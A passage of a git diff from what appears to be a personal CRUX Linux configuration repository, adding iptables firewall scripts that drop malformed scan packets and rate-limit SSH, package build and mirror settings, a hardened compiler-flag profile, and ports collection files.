+        echo "blockip_in and blockip_out added"
+    fi
+
+    ####### blocker Chain  ######
+    ## Block google dns
+    #$IPT -A blocker -s 8.8.0.0/24 -j LOG --log-level 7 --log-prefix "iptables: blocker google: "
+    #$IPT -A blocker -s 8.8.0.0/24 -j DROP
+    ## Block sync
+    $IPT -A blocker -p tcp ! --syn -m state --state NEW -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 7 --log-prefix "iptables: drop sync: "
+    $IPT -A blocker -p tcp ! --syn -m state --state NEW -j DROP
+    ## Block Fragments
+    $IPT -A blocker -f -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "iptables: drop frag: "
+    $IPT -A blocker -f -j DROP
+    $IPT -A blocker -p tcp --tcp-flags ALL FIN,URG,PSH -j DROP
+    $IPT -A blocker -p tcp --tcp-flags ALL ALL -j DROP
+    $IPT -A blocker -p tcp --tcp-flags ALL NONE -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "iptables: drop null: "
+    $IPT -A blocker -p tcp --tcp-flags ALL NONE -j DROP # NULL packets
+    $IPT -A blocker -p tcp --tcp-flags SYN,RST SYN,RST -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "iptables: drop syn rst syn rst: "
+    $IPT -A blocker -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
+    $IPT -A blocker -p tcp --tcp-flags SYN,FIN SYN,FIN -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "iptables: drop xmas: "
+    $IPT -A blocker -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP #XMAS
+    $IPT -A blocker -p tcp --tcp-flags FIN,ACK FIN -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "iptables: drop fin scan: "
+    $IPT -A blocker -p tcp --tcp-flags FIN,ACK FIN -j DROP # FIN packet scans
+    $IPT -A blocker -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j DROP
+    #$IPT -A blocker -p tcp --tcp-flags ACK,FIN FIN -j DROP
+    #$IPT -A blocker -p tcp --tcp-flags ACK,PSH PSH -j DROP
+    #$IPT -A blocker -p tcp --tcp-flags ACK,URG URG -j DROP
+    #$IPT -A blocker -p tcp --tcp-flags FIN,RST FIN,RST -j DROP
+    #$IPT -A blocker -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP
+    #$IPT -A blocker -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
+    #$IPT -A blocker -p tcp --tcp-flags ALL ALL -j DROP
+    #$IPT -A blocker -p tcp --tcp-flags ALL NONE -j DROP
+    #$IPT -A blocker -p tcp --tcp-flags ALL FIN,PSH,URG -j DROP
+    #$IPT -A blocker -p tcp --tcp-flags ALL SYN,FIN,PSH,URG -j DROP
+    #$IPT -A blocker -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j DROP
+
+    ## Return to caller
+    $IPT -A blocker -j RETURN
+
+    ######## DNS Server
+    #echo "server_in chain: Allow input to DNS Server"
+    $IPT -A srv_dns_in -p udp --dport 53 --sport 1024:65535 -m state --state NEW,ESTABLISHED -j ACCEPT
+    $IPT -A srv_dns_in -p tcp --dport 53 --sport 1024:65535  -m state --state NEW,ESTABLISHED -j ACCEPT
+    $IPT -A srv_dns_in -j RETURN
+    #echo "srv_dns_out chain: Allow output from DNS server"
+    $IPT -A srv_dns_out -p udp --sport 53 --dport 1024:65535 -m state --state RELATED,ESTABLISHED -j ACCEPT
+    $IPT -A srv_dns_out -p tcp --sport 53 --dport 1024:65535 -m state --state RELATED,ESTABLISHED -j ACCEPT
+    $IPT -A srv_dns_out -j RETURN
+
+    ####### Database Server
+    $IPT -A srv_db_in -p tcp --dport 5432 --sport 1024:65535 -m state --state NEW,ESTABLISHED -j ACCEPT
+    $IPT -A srv_db_in -j RETURN
+    $IPT -A srv_db_out -p tcp --sport 5432 --dport 1024:65535 -m state --state ESTABLISHED -j ACCEPT
+    $IPT -A srv_db_out -j RETURN
+
+    ####### SSH Server
+
+    $IPT -A srv_ssh_in -p tcp --dport 2222 -s ${BR_NET} -m state --state NEW -j ACCEPT
+    $IPT -A srv_ssh_in -p tcp --dport 2222 -m state --state NEW -j LOG --log-prefix "iptables: SSH NEW":
+    $IPT -A srv_ssh_in -p tcp --dport 2222 -m state --state NEW -m recent --set --name SSH -j ACCEPT
+
+    $IPT -A srv_ssh_in -p tcp --dport 2222 -m recent \
+        --update --seconds 60 --hitcount 4 --rttl \
+        --name SSH -j LOG --log-prefix "${SPAMDROPMSG} SSH"
+
+    $IPT -A srv_ssh_in -p tcp --dport 2222 -m recent --update --seconds 60 \
+        --hitcount 4 --rttl --name SSH -j DROP
+
+    $IPT -A srv_ssh_in -p tcp --dport 2222 --sport 1024:65535 -m state --state ESTABLISHED -j ACCEPT
+
+    #$IPT -A srv_ssh_in -p tcp --dport 22 -m state --state NEW -m recent --set --name SSH -j ACCEPT
+
+    #$IPT -A srv_ssh_in -p tcp --dport 22 -m recent \
+    #    --update --seconds 60 --hitcount 4 --rttl \
+    #    --name SSH -j LOG --log-prefix "${SPAMDROPMSG} SSH"
+
+    #$IPT -A srv_ssh_in -p tcp --dport 22 -m recent --update --seconds 60 \
+    #    --hitcount 4 --rttl --name SSH -j DROP
+
+    #$IPT -A srv_ssh_in -p tcp --dport 22 --sport 1024:65535 -m state --state ESTABLISHED -j ACCEPT
+    $IPT -A srv_ssh_in -j RETURN
+
+    $IPT -A srv_ssh_out -p tcp --sport 2222 --dport 1024:65535 -d ${BR_NET} -m state --state ESTABLISHED -j ACCEPT
+    $IPT -A srv_ssh_out -p tcp --tcp-flags SYN,ACK SYN,ACK --sport 2222 -j LOG --log-prefix "iptables: SSH OUT":
+    $IPT -A srv_ssh_out -p tcp --sport 2222 --dport 1024:65535 -m state --state ESTABLISHED -j ACCEPT
+    #$IPT -A srv_ssh_out -p tcp --sport 22 --dport 1024:65535 -m state --state ESTABLISHED -j ACCEPT
+    $IPT -A srv_ssh_out -j RETURN
+
+    ####### smtp Server
+    $IPT -A srv_smtp_in -p tcp --dport 25 --sport 1024:65535 -m state --state NEW,ESTABLISHED -j ACCEPT
+    $IPT -A srv_smtp_in -j RETURN
+    $IPT -A srv_smtp_out -p tcp --sport 25 --dport 1024:65535 -m state --state RELATED,ESTABLISHED -j ACCEPT
+    $IPT -A srv_smtp_out -j RETURN
+
+    ####### HTTP Server
+    $IPT -A srv_http_in -p tcp --dport 80 --sport 1024:65535 -m state --state NEW,ESTABLISHED -j ACCEPT
+    $IPT -A srv_http_in -j RETURN
+    $IPT -A srv_http_out -p tcp --sport 80 --dport 1024:65535 -m state --state RELATED,ESTABLISHED -j ACCEPT
+    $IPT -A srv_http_out -j RETURN
+
+    ####### HTTPS Server
+    $IPT -A srv_https_in -p tcp --dport 443 --sport 1024:65535 -m state --state NEW,ESTABLISHED -j ACCEPT
+    $IPT -A srv_https_in -j RETURN
+    $IPT -A srv_https_out -p tcp --sport 443 --dport 1024:65535 -m state --state RELATED,ESTABLISHED -j ACCEPT
+    $IPT -A srv_https_out -j RETURN
+
+    ###### GIT server
+    $IPT -A srv_git_in -p tcp --dport 9418 --sport 1024:65535 -m state --state NEW,ESTABLISHED -j ACCEPT
+    $IPT -A srv_git_in -j RETURN
+    $IPT -A srv_git_out -p tcp --sport 9418 --dport 1024:65535 -m state --state RELATED,ESTABLISHED -j ACCEPT
+    $IPT -A srv_git_out -j RETURN
+
+    ######## DNS Client
+    $IPT -A cli_dns_out -p udp --dport 53 --sport 1024:65535 -j ACCEPT
+    $IPT -A cli_dns_out -j RETURN
+    $IPT -A cli_dns_in -p udp --sport 53 --dport 1024:65535 -j ACCEPT
+    $IPT -A cli_dns_in -j RETURN
+
+    ######## HTTP Client
+    #$IPT -A cli_http_in -p tcp -m tcp --tcp-flags ACK --sport 80 --dport 1024:65535 -j DROP
+    $IPT -A cli_http_in -p tcp --sport 80 --dport 1024:65535 -m state --state ESTABLISHED -j ACCEPT
+    $IPT -A cli_http_in -p udp --sport 80 --dport 1024:65535 -m state --state ESTABLISHED -j ACCEPT
+    $IPT -A cli_http_in -j RETURN
+    $IPT -A cli_http_out -p tcp --dport 80 --sport 1024:65535 -m state --state NEW,ESTABLISHED -j ACCEPT
+    $IPT -A cli_http_out -p udp --dport 80 --sport 1024:65535 -m state --state NEW,ESTABLISHED -j ACCEPT
+    $IPT -A cli_http_out -j RETURN
+
+    ######## IRC client
+    $IPT -A cli_irc_in -p tcp --sport 6667 --dport 1024:65535 -m state --state ESTABLISHED -j ACCEPT
+    $IPT -A cli_irc_in -j RETURN
+    $IPT -A cli_irc_out -p tcp --dport 6667 --sport 1024:65535 -m state --state NEW,ESTABLISHED -j ACCEPT
+    $IPT -A cli_irc_out -j RETURN
+
+    ######## FTP client
+    $IPT -A cli_ftp_in -p tcp --sport 21 --dport 1024:65535 -m state --state ESTABLISHED -j ACCEPT
+    $IPT -A cli_ftp_in -p tcp --sport 20 --dport 1024:65535 -m state --state ESTABLISHED,RELATED -j ACCEPT
+    $IPT -A cli_ftp_in -p tcp --sport 1024:65535 --dport 1024:65535 -m state --state ESTABLISHED -j ACCEPT
+    $IPT -A cli_ftp_in -j RETURN
+    $IPT -A cli_ftp_out -p tcp --dport 21 --sport 1024:65535 -m state --state NEW,ESTABLISHED -j ACCEPT
+    $IPT -A cli_ftp_out -p tcp --dport 20 --sport 1024:65535 -m state --state ESTABLISHED -j ACCEPT
+    $IPT -A cli_ftp_out -p tcp --sport 1024:65535 --dport 1024:65535 -m state --state ESTABLISHED,RELATED -j ACCEPT
+    $IPT -A cli_ftp_out -j RETURN
+
+    ######## GIT client
+    $IPT -A cli_git_in -p tcp --sport 873 --dport 1024:65535 -m state --state ESTABLISHED -j ACCEPT
+    $IPT -A cli_git_in -p tcp --sport 9418 --dport 1024:65535 -m state --state ESTABLISHED -j ACCEPT
+    $IPT -A cli_git_in -j RETURN
+    $IPT -A cli_git_out -p tcp --dport 873 --sport 1024:65535 -m state --state NEW,ESTABLISHED -j ACCEPT
+    $IPT -A cli_git_out -p tcp --dport 9418 --sport 1024:65535 -m state --state NEW,ESTABLISHED -j ACCEPT
+    $IPT -A cli_git_out -j RETURN
+
+    ######## POP3S client
+    $IPT -A cli_pops_in -p tcp --sport 995 --dport 1024:65535 -m state --state ESTABLISHED -j ACCEPT
+    $IPT -A cli_pops_in -j RETURN
+    $IPT -A cli_pops_out -p tcp --dport 995 --sport 1024:65535 -m state --state NEW,ESTABLISHED -j ACCEPT
+    $IPT -A cli_pops_out -j RETURN
+
+    ######## SMTPS client
+    $IPT -A cli_smtps_in -p tcp --sport 465 --dport 1024:65535 -m state --state ESTABLISHED -j ACCEPT
+    $IPT -A cli_smtps_in -j RETURN
+    $IPT -A cli_smtps_out -p tcp --dport 465 --sport 1024:65535 -m state --state NEW,ESTABLISHED -j ACCEPT
+    $IPT -A cli_smtps_out -j RETURN
+
+    ######## HTTPS client
+    $IPT -A cli_https_in -p tcp --sport 443 --dport 1024:65535 -m state --state ESTABLISHED -j ACCEPT
+    $IPT -A cli_https_in -p udp --sport 443 --dport 1024:65535 -m state --state ESTABLISHED -j ACCEPT
+    $IPT -A cli_https_in -j RETURN
+    $IPT -A cli_https_out -p tcp --dport 443 --sport 1024:65535 -m state --state NEW,ESTABLISHED -j ACCEPT
+    $IPT -A cli_https_out -p udp --dport 443 --sport 1024:65535 -m state --state NEW,ESTABLISHED -j ACCEPT
+    $IPT -A cli_https_out -j RETURN
+
+    ######## SSH client
+    $IPT -A cli_ssh_in -p tcp --sport 2222 --dport 1024:65535 -m state --state ESTABLISHED -j ACCEPT
+    $IPT -A cli_ssh_in -p tcp --sport 22 --dport 1024:65535 -m state --state ESTABLISHED -j ACCEPT
+    $IPT -A cli_ssh_in -j RETURN
+
+    $IPT -A cli_ssh_out -p tcp -d ${BR_NET} --dport 2222 --sport 1024:65535 -m state --state NEW,ESTABLISHED -j ACCEPT
+    $IPT -A cli_ssh_out -p tcp --tcp-flags SYN,ACK SYN,ACK --dport 2222 -j LOG --log-prefix "iptables: SSH OUT":
+    $IPT -A cli_ssh_out -p tcp --dport 2222 --sport 1024:65535 -m state --state NEW,ESTABLISHED -j ACCEPT
+    $IPT -A cli_ssh_out -p tcp --dport 22 --sport 1024:65535 -m state --state NEW,ESTABLISHED -j ACCEPT
+    $IPT -A cli_ssh_out -j RETURN
+
+    ######## GPG key client
+    $IPT -A cli_gpg_in -p tcp --sport 11371 --dport 1024:65535 -m state --state ESTABLISHED -j ACCEPT
+    $IPT -A cli_gpg_in -j RETURN
+    $IPT -A cli_gpg_out -p tcp --dport 11371 --sport 1024:65535 -m state --state NEW,ESTABLISHED -j ACCEPT
+    $IPT -A cli_gpg_out -j RETURN
+
+    ######## DHCP Server
+    $IPT -A srv_dhcp -p udp --sport 68 --dport 67 -j ACCEPT
+    $IPT -A srv_dhcp -p udp --sport 67 --dport 68 -j ACCEPT
+    $IPT -A srv_dhcp -p udp --sport 67 --dport 67 -j ACCEPT
+    $IPT -A srv_dhcp -j RETURN
+
+    ####### RIP Server
+    $IPT -A srv_rip -p udp --sport 520 --dport 520 -j ACCEPT
+    $IPT -A srv_rip -j RETURN
+
+    ####### ICMP Server
+    $IPT -A srv_icmp -p icmp -j ACCEPT
+    $IPT -A srv_icmp -j RETURN
+
+    ####### NTP Client and Server
+    $IPT -A srv_ntp -p udp --sport 123 --dport 123 -j ACCEPT
+    $IPT -A srv_ntp -j RETURN
+
+}
diff --git a/linux/conf/iptables/ipt-open.sh b/linux/conf/iptables/ipt-open.sh
new file mode 100644
index 0000000..be2b86b
--- /dev/null
+++ b/linux/conf/iptables/ipt-open.sh
@@ -0,0 +1,17 @@
+#!/bin/bash
+
+## load client configuration
+${IPT} -P INPUT DROP
+${IPT} -P FORWARD DROP
+${IPT} -P OUTPUT ACCEPT
+
+${IPT} -A INPUT -i lo -s 127.0.0.0/8 -d 127.0.0.0/8 -j ACCEPT
+${IPT} -A OUTPUT -o lo -s 127.0.0.0/8 -d 127.0.0.0/8 -j ACCEPT
+
+${IPT} -A INPUT -p tcp --dport 1024:65535 -m state --state ESTABLISHED,RELATED -j ACCEPT
+${IPT} -A INPUT -p udp --dport 1024:65535 -m state --state ESTABLISHED,RELATED -j ACCEPT
+
+${IPT} -A OUTPUT  -j ACCEPT
+
+${IPT} -A FORWARD -j LOG --log-level 7 --log-prefix "iptables: FORWARD: "
+${IPT} -A INPUT -j LOG --log-level 7 --log-prefix "iptables: INPUT: "
diff --git a/linux/conf/iptables/ipt-server.sh b/linux/conf/iptables/ipt-server.sh
new file mode 100644
index 0000000..a44568a
--- /dev/null
+++ b/linux/conf/iptables/ipt-server.sh
@@ -0,0 +1,49 @@
+echo "setting server iptables ..."
+
+####### Input Chain ######
+$IPT -A INPUT -j blocker
+$IPT -A INPUT -j blockip_in
+
+$IPT -A INPUT -i ${PUB_IF} -s ${BR_NET} -p udp --dport 520 -j DROP
+
+$IPT -A INPUT -i ${PUB_IF} -d ${PUB_IP} -s ${DNS} -j cli_dns_in
+$IPT -A INPUT -i ${PUB_IF} -d ${PUB_IP} -s ${BR_NET} -j cli_http_in
+$IPT -A INPUT -i ${PUB_IF} -d ${PUB_IP} -s ${BR_NET} -j cli_https_in
+$IPT -A INPUT -i ${PUB_IF} -d ${PUB_IP} -s ${BR_NET} -j cli_ssh_in
+
+$IPT -A INPUT -i ${PUB_IF} -d ${PUB_IP} -s ${BR_NET} -j srv_http_in
+$IPT -A INPUT -i ${PUB_IF} -d ${PUB_IP} -s ${BR_NET} -j srv_https_in
+$IPT -A INPUT -i ${PUB_IF} -d ${PUB_IP} -s ${BR_NET} -j srv_ssh_in
+$IPT -A INPUT -i ${PUB_IF} -d ${PUB_IP} -s ${BR_NET} -j srv_git_in
+$IPT -A INPUT -i ${PUB_IF} -d ${PUB_IP} -s ${BR_NET} -j srv_smtp_in
+
+$IPT -A INPUT -i ${PUB_IF} -d ${PUB_IP} -j cli_https_in
+
+$IPT -A INPUT -i ${PUB_IF} -d ${PUB_IP} -j srv_https_in
+$IPT -A INPUT -i ${PUB_IF} -d ${PUB_IP} -j srv_http_in
+$IPT -A INPUT -i ${PUB_IF} -d ${PUB_IP} -j srv_ssh_in
+$IPT -A INPUT -i ${PUB_IF} -d ${PUB_IP} -j srv_git_in
+
+####### Output Chain ######
+$IPT -A OUTPUT -j blocker
+$IPT -A OUTPUT -j blockip_out
+
+$IPT -A OUTPUT -o ${PUB_IF} -d ${DNS} -s ${PUB_IP} -j cli_dns_out
+$IPT -A OUTPUT -o ${PUB_IF} -d ${BR_NET} -s ${PUB_IP} -j cli_http_out
+$IPT -A OUTPUT -o ${PUB_IF} -d ${BR_NET} -s ${PUB_IP} -j cli_ssh_out
+
+$IPT -A OUTPUT -o ${PUB_IF} -d ${BR_NET} -s ${PUB_IP} -j srv_https_out
+$IPT -A OUTPUT -o ${PUB_IF} -d ${BR_NET} -s ${PUB_IP} -j srv_http_out
+$IPT -A OUTPUT -o ${PUB_IF} -d ${BR_NET} -s ${PUB_IP} -j srv_ssh_out
+$IPT -A OUTPUT -o ${PUB_IF} -d ${BR_NET} -s ${PUB_IP} -j srv_smtp_out
+$IPT -A OUTPUT -o ${PUB_IF} -d ${BR_NET} -s ${PUB_IP} -j srv_git_out
+
+$IPT -A OUTPUT -o ${PUB_IF} -s ${PUB_IP} -j cli_https_out
+
+$IPT -A OUTPUT -o ${PUB_IF} -s ${PUB_IP} -j srv_https_out
+$IPT -A OUTPUT -o ${PUB_IF} -s ${PUB_IP} -j srv_http_out
+$IPT -A OUTPUT -o ${PUB_IF} -s ${PUB_IP} -j srv_ssh_out
+$IPT -A OUTPUT -o ${PUB_IF} -s ${PUB_IP} -j srv_git_out
+
+## log everything else and drop
+ipt_log
diff --git a/linux/conf/iptables/ipt-start.sh b/linux/conf/iptables/ipt-start.sh
new file mode 100644
index 0000000..65b848c
--- /dev/null
+++ b/linux/conf/iptables/ipt-start.sh
@@ -0,0 +1,34 @@
+#!/bin/bash
+
+echo "starting iptables..."
+
+source /etc/iptables/ipt-firewall.sh
+
+ipt_clear
+ipt_tables
+
+# Unlimited on loopback
+$IPT -A INPUT -i lo -s 127.0.0.0/8 -d 127.0.0.0/8 -j ACCEPT
+$IPT -A OUTPUT -o lo -s 127.0.0.0/8 -d 127.0.0.0/8 -j ACCEPT
+
+case $TYPE in
+    bridge)
+        #ipt_clear
+        echo 1 > /proc/sys/net/ipv4/ip_forward
+        source /etc/iptables/ipt-bridge.sh
+        exit 0
+        ;;
+    server)
+        #ipt_clear
+        source /etc/iptables/ipt-server.sh
+        exit 0
+        ;;
+    client)
+        source /etc/iptables/ipt-client.sh
+        exit 0
+        ;;
+    open)
+        source /etc/iptables/ipt-open.sh
+        exit 0
+        ;;
+esac
diff --git a/linux/conf/iptables/ipt-stop.sh b/linux/conf/iptables/ipt-stop.sh
new file mode 100644
index 0000000..55af57c
--- /dev/null
+++ b/linux/conf/iptables/ipt-stop.sh
@@ -0,0 +1,8 @@
+#!/bin/bash
+
+echo "blocking network..."
+
+source /etc/iptables/ipt-firewall.sh
+
+ipt_clear
+ipt_tables
diff --git a/linux/conf/pkg-get.conf b/linux/conf/pkg-get.conf
new file mode 100644
index 0000000..7198578
--- /dev/null
+++ b/linux/conf/pkg-get.conf
@@ -0,0 +1,15 @@
+##
+# /etc/pkg-get.conf
+# pkg-get configuration file
+
+# package repositories (remote)
+# The first two are remote repoistories, the last is a local one
+pkgdir          /usr/ports/server|https://tribu.semdestino.org/mirror/packages
+#pkgdir          /usr/packages/java|http://www.foobar.com/java
+#pkgdir          /usr/packages/games
+
+# runscripts: if "yes" pre-post install scripts are
+# automatically executed. Handle with care.
+runscripts     yes
+
+preferhigher yes      # (yes|no)
diff --git a/linux/conf/pkgmk.conf b/linux/conf/pkgmk.conf
new file mode 100644
index 0000000..6d3ed7d
--- /dev/null
+++ b/linux/conf/pkgmk.conf
@@ -0,0 +1,60 @@
+#
+# /etc/pkgmk.conf: pkgmk(8) configuration
+#
+
+export CFLAGS="-O2 -march=x86-64"
+export CXXFLAGS="${CFLAGS}"
+
+# local compile only
+export JOBS=$(nproc)
+export MAKEFLAGS="-j $JOBS"
+
+# ccache settings
+#export PATH="/usr/lib/ccache/:$PATH"
+#export CCACHE_DIR="/usr/ports/ccache"
+#export CCACHE_PREFIX="distcc"
+#export CCACHE_COMPILERCHECK="%compiler% -dumpversion; crux"
+
+## compile using distcc without ccache
+##export PATH="/usr/lib/distcc/:$PATH"
+
+# distcc settings
+#export DISTCC_HOSTS="localhost/4,lzo,cpp xborg/4,lzo,cpp"
+#export JOBS=$(/usr/bin/distcc -j 2> /dev/null)
+#export DISTCC_DIR="/usr/ports/distcc"
+#export MAKEFLAGS="-j ${JOBS}"
+#export SCONSFLAGS="$MAKEFLAGS"
+
+case ${PKGMK_ARCH} in
+	"64"|"")
+		;;
+	"32")
+		export CFLAGS="${CFLAGS} -m32"
+		export CXXFLAGS="${CXXFLAGS} -m32"
+		export LDFLAGS="${LDFLAGS} -m32"
+		export PKG_CONFIG_LIBDIR="/usr/lib32/pkgconfig"
+		;;
+	*)
+		echo "Unknown architecture selected! Exiting."
+		exit 1
+		;;
+esac
+
+PKGMK_SOURCE_MIRRORS=(https://mirror.leetio.dev/distfiles/ https://mirror.leetio.dev/archive/distfiles/)
+# PKGMK_SOURCE_DIR="$PWD"
+PKGMK_SOURCE_DIR="/usr/ports/distfiles"
+# PKGMK_PACKAGE_DIR="$PWD"
+PKGMK_PACKAGE_DIR="/usr/ports/packages"
+# PKGMK_WORK_DIR="$PWD/work"
+PKGMK_WORK_DIR="/usr/ports/work/$name"
+# PKGMK_DOWNLOAD="no"
+# PKGMK_IGNORE_FOOTPRINT="no"
+# PKGMK_IGNORE_NEW="no"
+# PKGMK_NO_STRIP="no"
+# PKGMK_DOWNLOAD_PROG="wget"
+# PKGMK_WGET_OPTS=""
+# PKGMK_CURL_OPTS=""
+# PKGMK_COMPRESSION_MODE="gz"
+# PKGMK_UP_TO_DATE=yes
+
+# End of file
diff --git a/linux/conf/pkgmk.conf.harden b/linux/conf/pkgmk.conf.harden
new file mode 100644
index 0000000..3bf88b1
--- /dev/null
+++ b/linux/conf/pkgmk.conf.harden
@@ -0,0 +1,117 @@
+#
+# /etc/pkgmk.conf: pkgmk(8) configuration
+#
+# ONLY FOR x86 64 PROCESSORS
+CUSTOMVERSION=8
+
+W_CFLAGS="-Wall -Wextra -Wno-inline -Wundef -Wformat=2 -Wformat-security -Wformat-nonliteral -Wlogical-op -Wsign-compare -Wmissing-include-dirs -Wold-style-definition -Wpointer-arith -Winit-self -Wdeclaration-after-statement -Wfloat-equal -Wsuggest-attribute=noreturn -Wmissing-prototypes -Wstrict-prototypes -Wredundant-decls -Wmissing-declarations -Wmissing-noreturn -Wshadow -Wendif-labels -Wstrict-aliasing=2 -Wwrite-strings -Wno-long-long -Wno-overlength-strings -Wno-unused-parameter -Wno-missing-field-initializers -Wno-unused-result -Werror=overflow -Wdate-time -Wnested-externs"
+
+#-ffast-math -fno-common -fdiagnostics-show-option -fno-strict-aliasing -fvisibility=hidden -ffunction-sections -fdata-sections -ffat-lto-objects
+H_CFLAGS="-g -O1 -march=x86-64 -pipe -fstack-protector-strong --param=ssp-buffer-size=4 -fno-plt -fstack-check"
+
+CFLAGS="${W_CFLAGS} ${H_CFLAGS} -fPIC -fPIE -pie"
+CXXFLAGS="${CFLAGS} -D_FORTIFY_SOURCE=2"
+CPPFLAGS="-O1 -Wp,-D_FORTIFY_SOURCE=2"
+#--as-needed -Wl,--no-undefined -Wl,--gc-sections -Wl
+LDFLAGS="-fPIC -fPIE -pie -Wl,-O1,--sort-common,--as-needed,-z,relro,-z,now"
+
+
+PIC_CFLAGS="${W_FLAGS} ${H_CFLAGS} -fPIC"
+PIC_CXXFLAGS="${PIC_CFLAGS} -D_FORTIFY_SOURCE=2"
+PIC_LDFLAGS="-fPIC -Wl,-O1,--sort-common,--as-needed,-z,relro,-z,now"
+
+# local compile only
+export JOBS=$(nproc)
+export MAKEFLAGS="-j $JOBS"
+
+# ccache settings
+export PATH="/usr/lib/ccache/:$PATH"
+export CCACHE_DIR="/usr/ports/ccache"
+export CCACHE_COMPILERCHECK="%compiler% -dumpversion; crux"
+
+# compile using ccache and distcc
+export CCACHE_PREFIX="distcc"
+#export DISTCC_HOSTS="localhost/4 xborg/4 c11/2"
+export DISTCC_HOSTS="ports/4 localhost/2"
+
+## compile using distcc without ccache
+#export PATH="/usr/lib/distcc/:$PATH"
+#export PUMP_BUILD=yes
+
+# distcc settings
+export JOBS=$(/usr/bin/distcc -j 2> /dev/null)
+export DISTCC_DIR="/usr/ports/distcc"
+export MAKEFLAGS="-j ${JOBS}"
+export SCONSFLAGS="$MAKEFLAGS"
+
+case ${name} in
+
+	"keyutils")
+                export CFLAGS=" ${H_CFLAGS} -fPIC -fPIE -pie -g -O1 -march=x86-64 -pipe"
+                export CXXFLAGS="${CFLAGS} -D_FORTIFY_SOURCE=2"
+        ;;
+	"grub2")
+                export CFLAGS="${W_CFLAGS} -g -O1 -march=x86-64 -pipe"
+                export CXXFLAGS="${CFLAGS} -D_FORTIFY_SOURCE=2"
+                export LDFLAGS=""
+                ;;
+        "grub2-efi")
+                export CFLAGS="${W_CFLAGS} -g -O1 -march=x86-64 -pipe"
+                export CXXFLAGS="${CFLAGS} -D_FORTIFY_SOURCE=2"
+                export LDFLAGS=""
+                ;;
+	"gcc")
+    		export CFLAGS="-g -O2 -march=x86-64 -pipe -fPIC -fstack-protector-strong --param=ssp-buffer-size=4 -fno-plt -fstack-check"
+    		export CXXFLAGS="${CFLAGS}"
+    		export CPPFLAGS="${H_CPPFLAGS}"
+    		export LDFLAGS="-Wl,-O1,--sort-common,--as-needed,-z,relro,-z,now"
+		;;
+	"glibc")
+       		export CFLAGS="${CFLAGS} -fno-plt -fstack-check"
+		export CXXFLAGS="${CFLAGS}"
+		export CPPFLAGS="-O1"
+		export LDFLAGS=""
+		;;
+        "libcap")
+                export CFLAGS="${PIC_CFLAGS}"
+		export CXXFLAGS="${PIC_CXXFLAGS}"
+		export LDFLAGS="${PIC_LDFLAGS}"
+                ;;
+        "mdadm")
+                export CFLAGS="${PIC_CFLAGS}"
+		export CXXFLAGS="${PIC_CXXFLAGS}"
+		export LDFLAGS="${PIC_LDFLAGS}"
+                ;;
+	"openssl")
+         	export CFLAGS="${PIC_CFLAGS}"
+		export CXXFLAGS="${PIC_CXXFLAGS}"
+		export LDFLAGS="${PIC_LDFLAGS}"
+		;;
+esac
+
+case ${PKGMK_ARCH} in
+	"64"|"")
+		;;
+	*)
+		echo "Unknown architecture selected! Exiting."
+		exit 1
+		;;
+esac
+
+#PKGMK_SOURCE_MIRRORS=(https://crux.nu/distfiles/)
+#PKGMK_SOURCE_MIRRORS=(https://crux.ster.zone/distfiles/)
+PKGMK_SOURCE_MIRRORS=(http://tribu.semdestino.org/mirror/distfiles/ http://tribu.semdestino.org/mirror/archive/distfiles/)
+PKGMK_SOURCE_DIR="/usr/ports/distfiles"
+PKGMK_PACKAGE_DIR="/usr/ports/packages"
+PKGMK_WORK_DIR="/usr/ports/work/$name"
+# PKGMK_DOWNLOAD="no"
+# PKGMK_IGNORE_FOOTPRINT="no"
+# PKGMK_IGNORE_NEW="no"
+# PKGMK_NO_STRIP="no"
+# PKGMK_DOWNLOAD_PROG="wget"
+# PKGMK_WGET_OPTS=""
+# PKGMK_CURL_OPTS=""
+# PKGMK_COMPRESSION_MODE="gz"
+#PKGMK_UP_TO_DATE=yes
+
+# End of file
diff --git a/linux/conf/ports.conf b/linux/conf/ports.conf
new file mode 100644
index 0000000..4420813
--- /dev/null
+++ b/linux/conf/ports.conf
@@ -0,0 +1 @@
+PORTS_DIR=/usr/ports
diff --git a/linux/conf/ports/6c37-dropin.httpup b/linux/conf/ports/6c37-dropin.httpup
new file mode 100644
index 0000000..6dfb3e2
--- /dev/null
+++ b/linux/conf/ports/6c37-dropin.httpup
@@ -0,0 +1,5 @@
+# Collection 6c37-dropin, by camille at airmail dot cc
+# File generated by the CRUX portdb http://crux.nu/portdb/
+
+ROOT_DIR=/usr/ports/6c37-dropin
+URL=https://raw.githubusercontent.com/6c37/crux-ports-dropin/3.3/
diff --git a/linux/conf/ports/6c37.httpup b/linux/conf/ports/6c37.httpup
new file mode 100644
index 0000000..dbc9422
--- /dev/null
+++ b/linux/conf/ports/6c37.httpup
@@ -0,0 +1,5 @@
+# Collection 6c37, by kori at openmailbox dot org
+# File generated by the CRUX portdb http://crux.nu/portdb/
+
+ROOT_DIR=/usr/ports/6c37
+URL=https://raw.githubusercontent.com/6c37/crux-ports/3.2/
diff --git a/linux/conf/ports/compat-32.git b/linux/conf/ports/compat-32.git
new file mode 100644
index 0000000..9f89a92
--- /dev/null
+++ b/linux/conf/ports/compat-32.git
@@ -0,0 +1,7 @@
+# Collection compat-32
+#
+NAME=compat-32
+URL=git://crux.nu/ports/compat-32.git
+BRANCH=3.6
+destination=/usr/ports/compat-32
+PORTS_DIR="/usr/ports"
diff --git a/linux/conf/ports/compat-32.pub b/linux/conf/ports/compat-32.pub
new file mode 100644
index 0000000..4ef53cc
--- /dev/null
+++ b/linux/conf/ports/compat-32.pub
@@ -0,0 +1,2 @@
+untrusted comment: compat-32 public key
+RWSwxGo/zH7eXV9L7s9BhT4ZBQ6YLE+iWPkJ190GTTiP6IBBTC0XJOrM
diff --git a/linux/conf/ports/contrib.git b/linux/conf/ports/contrib.git
new file mode 100644
index 0000000..493f252
--- /dev/null
+++ b/linux/conf/ports/contrib.git
@@ -0,0 +1,7 @@
+# Collection contrib
+#
+NAME=contrib
